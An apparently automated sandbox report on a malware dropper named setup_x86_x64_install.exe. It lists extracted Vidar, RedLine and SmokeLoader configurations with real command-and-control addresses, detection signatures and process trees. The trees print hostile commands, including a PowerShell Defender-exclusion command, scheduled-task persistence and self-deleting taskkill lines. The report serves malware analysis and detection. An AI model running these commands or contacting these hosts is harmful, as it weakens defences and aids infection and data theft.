djvu | 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407

Resubmissions

09-09-2021 17:41

210909-v9lgtabfhq 10

09-09-2021 04:26

08-09-2021 21:37

08-09-2021 21:29

08-09-2021 13:52

07-09-2021 18:07

Analysis

max time kernel
37s
max time network
479s
platform
windows10_x64
resource
win10-de
submitted
08-09-2021 21:29

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

2.9MB
MD5

3f1f81101d0ce95fdfac97f5913cd662
SHA1

8e615a64e4d72b08926242b7d73a608bdd7e9fce
SHA256

90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
SHA512

a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

https://gheorghip.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

Jayson

95.181.172.207:56915

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

40.5

Botnet

916

https://gheorghip.tumblr.com/

Attributes

profile_id
916

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

resource	yara_rule
behavioral6/memory/5888-729-0x0000000002FC0000-0x00000000038DE000-memory.dmp	family_glupteba
behavioral6/memory/5888-743-0x0000000000400000-0x0000000002575000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	3584	rundll32.exe	21
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6672	3584	rundll32.exe	21
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7896	3584	rundll32.exe	21

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 16 IoCs

resource	yara_rule
behavioral6/memory/4748-215-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral6/memory/4748-216-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/4748-229-0x0000000005180000-0x0000000005786000-memory.dmp	family_redline
behavioral6/memory/4924-235-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/4924-247-0x0000000005220000-0x0000000005826000-memory.dmp	family_redline
behavioral6/memory/3504-270-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/3504-311-0x0000000004E40000-0x0000000005446000-memory.dmp	family_redline
behavioral6/memory/4792-342-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/4792-362-0x0000000004C10000-0x0000000005216000-memory.dmp	family_redline
behavioral6/memory/3160-443-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/1760-534-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/5516-583-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/5952-658-0x0000000005620000-0x0000000005C26000-memory.dmp	family_redline
behavioral6/memory/5780-673-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/5648-719-0x000000000041C5E2-mapping.dmp	family_redline
behavioral6/memory/4212-803-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral6/files/0x000400000001ab16-157.dat	family_socelars
behavioral6/files/0x000400000001ab16-181.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 928 created 4444	928	WerFault.exe	104

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

rl_trojan 9 IoCs

redline stealer.

stealer

resource	yara_rule
behavioral6/files/0x000500000001ab1a-151.dat	redline
behavioral6/files/0x000500000001ab1a-183.dat	redline
behavioral6/files/0x000500000001ab1a-217.dat	redline
behavioral6/files/0x000500000001ab1a-236.dat	redline
behavioral6/files/0x000500000001ab1a-272.dat	redline
behavioral6/files/0x000500000001ab1a-343.dat	redline
behavioral6/files/0x000500000001ab1a-367.dat	redline
behavioral6/files/0x000500000001ab1a-445.dat	redline
behavioral6/files/0x000500000001ab1a-538.dat	redline

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral6/memory/4444-208-0x0000000004880000-0x0000000004951000-memory.dmp	family_vidar
behavioral6/memory/4444-211-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar
behavioral6/memory/4780-579-0x00000000048D0000-0x00000000049A1000-memory.dmp	family_vidar
behavioral6/memory/4780-596-0x0000000000400000-0x0000000002BB2000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral6/files/0x000400000001ab0e-123.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab0e-124.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab0d-128.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab0d-130.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab0d-129.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab10-126.dat	aspack_v212_v242
behavioral6/files/0x000400000001ab10-131.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 25 IoCs

pid	Process
3400	setup_installer.exe
3836	setup_install.exe
4156	Tue11d7385a978cc.exe
4212	Tue11f251db82fb7b.exe
4240	Tue11b9d76a96506.exe
4276	Tue1109eec571ac.exe
4304	Tue11141271fbe5877f.exe
4368	Tue11bc0507b56295.exe
4400	Tue118f55232e4.exe
4428	Tue11e4e580f2e8141a3.exe
4444	Tue112c483dd3245d.exe
4576	Tue11b9d76a96506.tmp
4748	Tue11e4e580f2e8141a3.exe
4924	Tue11e4e580f2e8141a3.exe
3504	Tue11e4e580f2e8141a3.exe
4792	Tue11e4e580f2e8141a3.exe
3776	Tue11e4e580f2e8141a3.exe
4440	MicrosoftEdgeCP.exe
3816	LzmwAqmV.exe
3160	Tue11e4e580f2e8141a3.exe
4812	1065150.exe
4216	Chrome 5.exe
4268	PublicDwlBrowser1100.exe
4780	Alfanewfile2.exe
4436	rundll32.exe

Loads dropped DLL 7 IoCs

pid	Process
3836	setup_install.exe
3836	setup_install.exe
3836	setup_install.exe
3836	setup_install.exe
3836	setup_install.exe
3836	setup_install.exe
4576	Tue11b9d76a96506.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4708	icacls.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000400000001ab5e-530.dat	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1065150.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
434	api.2ip.ua
436	api.2ip.ua
526	api.2ip.ua
77	ip-api.com
150	ip-api.com

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4428 set thread context of 4748	4428	Tue11e4e580f2e8141a3.exe	107
PID 4428 set thread context of 4924	4428	Tue11e4e580f2e8141a3.exe	108
PID 4428 set thread context of 3504	4428	Tue11e4e580f2e8141a3.exe	110
PID 4428 set thread context of 4792	4428	Tue11e4e580f2e8141a3.exe	115
PID 4428 set thread context of 3160	4428	Tue11e4e580f2e8141a3.exe	118

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 36 IoCs

pid	pid_target	Process	procid_target
4312	4276	WerFault.exe	97
4596	4276	WerFault.exe	97
4744	4276	WerFault.exe	97
3592	4276	WerFault.exe	97
4992	3836	WerFault.exe	83
928	4444	WerFault.exe	104
5496	4276	WerFault.exe	97
5888	4276	WerFault.exe	97
5476	5180	WerFault.exe	128
6012	5180	WerFault.exe	128
6128	4276	WerFault.exe	97
5380	5180	WerFault.exe	128
5928	4276	WerFault.exe	97
3172	5180	WerFault.exe	128
4628	5180	WerFault.exe	128
5912	5180	WerFault.exe	128
4892	4440	WerFault.exe	120
7388	7088	WerFault.exe	218
7568	7088	WerFault.exe	218
7760	7088	WerFault.exe	218
8020	7088	WerFault.exe	218
3988	7088	WerFault.exe	218
6664	6600	WerFault.exe	203
4460	6600	WerFault.exe	203
5624	5888	WerFault.exe	155
4492	6600	WerFault.exe	203
7580	5888	WerFault.exe	155
7508	6600	WerFault.exe	203
7284	5888	WerFault.exe	155
7328	5888	WerFault.exe	155
6356	7088	WerFault.exe	218
8044	7088	WerFault.exe	218
4996	7088	WerFault.exe	218
5068	5888	WerFault.exe	155
8012	8132	WerFault.exe	258
6004	4256	WerFault.exe	172

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue11bc0507b56295.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
7072	schtasks.exe
5460	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
676	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
7056	taskkill.exe
6808	taskkill.exe
8092	taskkill.exe
7356	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4224	powershell.exe
4224	powershell.exe
4368	Tue11bc0507b56295.exe
4368	Tue11bc0507b56295.exe
4224	powershell.exe
4224	powershell.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
4312	WerFault.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe
4596	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4368	Tue11bc0507b56295.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	4212	Tue11f251db82fb7b.exe
Token: SeCreateTokenPrivilege	4400	Tue118f55232e4.exe
Token: SeAssignPrimaryTokenPrivilege	4400	Tue118f55232e4.exe
Token: SeLockMemoryPrivilege	4400	Tue118f55232e4.exe
Token: SeIncreaseQuotaPrivilege	4400	Tue118f55232e4.exe
Token: SeMachineAccountPrivilege	4400	Tue118f55232e4.exe
Token: SeTcbPrivilege	4400	Tue118f55232e4.exe
Token: SeSecurityPrivilege	4400	Tue118f55232e4.exe
Token: SeTakeOwnershipPrivilege	4400	Tue118f55232e4.exe
Token: SeLoadDriverPrivilege	4400	Tue118f55232e4.exe
Token: SeSystemProfilePrivilege	4400	Tue118f55232e4.exe
Token: SeSystemtimePrivilege	4400	Tue118f55232e4.exe
Token: SeProfSingleProcessPrivilege	4400	Tue118f55232e4.exe
Token: SeIncBasePriorityPrivilege	4400	Tue118f55232e4.exe
Token: SeCreatePagefilePrivilege	4400	Tue118f55232e4.exe
Token: SeCreatePermanentPrivilege	4400	Tue118f55232e4.exe
Token: SeBackupPrivilege	4400	Tue118f55232e4.exe
Token: SeRestorePrivilege	4400	Tue118f55232e4.exe
Token: SeShutdownPrivilege	4400	Tue118f55232e4.exe
Token: SeDebugPrivilege	4400	Tue118f55232e4.exe
Token: SeAuditPrivilege	4400	Tue118f55232e4.exe
Token: SeSystemEnvironmentPrivilege	4400	Tue118f55232e4.exe
Token: SeChangeNotifyPrivilege	4400	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	4400	Tue118f55232e4.exe
Token: SeUndockPrivilege	4400	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	4400	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	4400	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	4400	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	4400	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	4400	Tue118f55232e4.exe
Token: 31	4400	Tue118f55232e4.exe
Token: 32	4400	Tue118f55232e4.exe
Token: 33	4400	Tue118f55232e4.exe
Token: 34	4400	Tue118f55232e4.exe
Token: 35	4400	Tue118f55232e4.exe
Token: SeDebugPrivilege	4304	Tue11141271fbe5877f.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeRestorePrivilege	4312	WerFault.exe
Token: SeBackupPrivilege	4312	WerFault.exe
Token: SeDebugPrivilege	4312	WerFault.exe
Token: SeDebugPrivilege	4596	WerFault.exe
Token: SeDebugPrivilege	4744	WerFault.exe
Token: SeDebugPrivilege	3592	WerFault.exe
Token: SeDebugPrivilege	4992	WerFault.exe
Token: SeDebugPrivilege	928	WerFault.exe
Token: SeDebugPrivilege	4440	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3076 wrote to memory of 3400	3076	setup_x86_x64_install.exe	82
PID 3076 wrote to memory of 3400	3076	setup_x86_x64_install.exe	82
PID 3076 wrote to memory of 3400	3076	setup_x86_x64_install.exe	82
PID 3400 wrote to memory of 3836	3400	setup_installer.exe	83
PID 3400 wrote to memory of 3836	3400	setup_installer.exe	83
PID 3400 wrote to memory of 3836	3400	setup_installer.exe	83
PID 3836 wrote to memory of 3112	3836	setup_install.exe	86
PID 3836 wrote to memory of 3112	3836	setup_install.exe	86
PID 3836 wrote to memory of 3112	3836	setup_install.exe	86
PID 3836 wrote to memory of 4088	3836	setup_install.exe	87
PID 3836 wrote to memory of 4088	3836	setup_install.exe	87
PID 3836 wrote to memory of 4088	3836	setup_install.exe	87
PID 3836 wrote to memory of 2408	3836	setup_install.exe	88
PID 3836 wrote to memory of 2408	3836	setup_install.exe	88
PID 3836 wrote to memory of 2408	3836	setup_install.exe	88
PID 3836 wrote to memory of 3192	3836	setup_install.exe	89
PID 3836 wrote to memory of 3192	3836	setup_install.exe	89
PID 3836 wrote to memory of 3192	3836	setup_install.exe	89
PID 3836 wrote to memory of 776	3836	setup_install.exe	90
PID 3836 wrote to memory of 776	3836	setup_install.exe	90
PID 3836 wrote to memory of 776	3836	setup_install.exe	90
PID 3836 wrote to memory of 4100	3836	setup_install.exe	91
PID 3836 wrote to memory of 4100	3836	setup_install.exe	91
PID 3836 wrote to memory of 4100	3836	setup_install.exe	91
PID 3836 wrote to memory of 4116	3836	setup_install.exe	92
PID 3836 wrote to memory of 4116	3836	setup_install.exe	92
PID 3836 wrote to memory of 4116	3836	setup_install.exe	92
PID 3836 wrote to memory of 4140	3836	setup_install.exe	100
PID 3836 wrote to memory of 4140	3836	setup_install.exe	100
PID 3836 wrote to memory of 4140	3836	setup_install.exe	100
PID 4088 wrote to memory of 4156	4088	cmd.exe	93
PID 4088 wrote to memory of 4156	4088	cmd.exe	93
PID 4088 wrote to memory of 4156	4088	cmd.exe	93
PID 3836 wrote to memory of 4172	3836	setup_install.exe	94
PID 3836 wrote to memory of 4172	3836	setup_install.exe	94
PID 3836 wrote to memory of 4172	3836	setup_install.exe	94
PID 3836 wrote to memory of 4196	3836	setup_install.exe	99
PID 3836 wrote to memory of 4196	3836	setup_install.exe	99
PID 3836 wrote to memory of 4196	3836	setup_install.exe	99
PID 3192 wrote to memory of 4212	3192	cmd.exe	98
PID 3192 wrote to memory of 4212	3192	cmd.exe	98
PID 3112 wrote to memory of 4224	3112	cmd.exe	95
PID 3112 wrote to memory of 4224	3112	cmd.exe	95
PID 3112 wrote to memory of 4224	3112	cmd.exe	95
PID 2408 wrote to memory of 4240	2408	cmd.exe	96
PID 2408 wrote to memory of 4240	2408	cmd.exe	96
PID 2408 wrote to memory of 4240	2408	cmd.exe	96
PID 776 wrote to memory of 4276	776	cmd.exe	97
PID 776 wrote to memory of 4276	776	cmd.exe	97
PID 776 wrote to memory of 4276	776	cmd.exe	97
PID 4140 wrote to memory of 4304	4140	cmd.exe	101
PID 4140 wrote to memory of 4304	4140	cmd.exe	101
PID 4100 wrote to memory of 4368	4100	cmd.exe	102
PID 4100 wrote to memory of 4368	4100	cmd.exe	102
PID 4100 wrote to memory of 4368	4100	cmd.exe	102
PID 4172 wrote to memory of 4400	4172	cmd.exe	103
PID 4172 wrote to memory of 4400	4172	cmd.exe	103
PID 4172 wrote to memory of 4400	4172	cmd.exe	103
PID 4116 wrote to memory of 4428	4116	cmd.exe	106
PID 4116 wrote to memory of 4428	4116	cmd.exe	106
PID 4116 wrote to memory of 4428	4116	cmd.exe	106
PID 4196 wrote to memory of 4444	4196	cmd.exe	104
PID 4196 wrote to memory of 4444	4196	cmd.exe	104
PID 4196 wrote to memory of 4444	4196	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3076
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3112
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4224
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4088
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        
        PID:4240
      - C:\Users\Admin\AppData\Local\Temp\is-IK5GN.tmp\Tue11b9d76a96506.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IK5GN.tmp\Tue11b9d76a96506.tmp" /SL5="$801DA,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11b9d76a96506.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\is-GOSOI.tmp\46807GHF____.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GOSOI.tmp\46807GHF____.exe" /S /UID=burnerch2
        7⤵
        
        PID:5692
        
        C:\Program Files\Internet Explorer\WDBDABRMRI\ultramediaburner.exe
        
        "C:\Program Files\Internet Explorer\WDBDABRMRI\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Local\Temp\is-4AHE9.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4AHE9.tmp\ultramediaburner.tmp" /SL5="$1033C,281924,62464,C:\Program Files\Internet Explorer\WDBDABRMRI\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:6176
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\2b-f52b8-664-6a8b1-0a81a0c57ca54\Cedigiraepy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2b-f52b8-664-6a8b1-0a81a0c57ca54\Cedigiraepy.exe"
        8⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\8c-24f43-797-f5996-a298c17b09372\Vaehaexavosho.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8c-24f43-797-f5996-a298c17b09372\Vaehaexavosho.exe"
        8⤵
        
        PID:5612
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yfnnwdqj.cyz\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\yfnnwdqj.cyz\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\yfnnwdqj.cyz\GcleanerEU.exe /eufive
        10⤵
        
        PID:6600
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 844
        11⤵
        Program crash
        
        PID:6664
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 1176
        11⤵
        Program crash
        
        PID:4460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 1240
        11⤵
        Program crash
        
        PID:4492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6600 -s 1216
        11⤵
        Program crash
        
        PID:7508
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mfbjbpjb.ci4\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\mfbjbpjb.ci4\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\mfbjbpjb.ci4\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:6304
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mfbjbpjb.ci4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mfbjbpjb.ci4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630877101 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:4512
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txr3nexh.54p\anyname.exe & exit
        9⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\txr3nexh.54p\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\txr3nexh.54p\anyname.exe
        10⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\txr3nexh.54p\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\txr3nexh.54p\anyname.exe" -u
        11⤵
        
        PID:6124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\onz5f0ns.n32\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\onz5f0ns.n32\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\onz5f0ns.n32\gcleaner.exe /mixfive
        10⤵
        
        PID:7088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 648
        11⤵
        Program crash
        
        PID:7388
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
        11⤵
        Program crash
        
        PID:7568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 764
        11⤵
        Program crash
        
        PID:7760
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 812
        11⤵
        Program crash
        
        PID:8020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 880
        11⤵
        Program crash
        
        PID:3988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 940
        11⤵
        Program crash
        
        PID:6356
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 1192
        11⤵
        Program crash
        
        PID:8044
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 1140
        11⤵
        Program crash
        
        PID:4996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\onz5f0ns.n32\gcleaner.exe" & exit
        11⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:7356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3192
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4212
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5596
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:7072
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:6984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:5268
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:5460
        
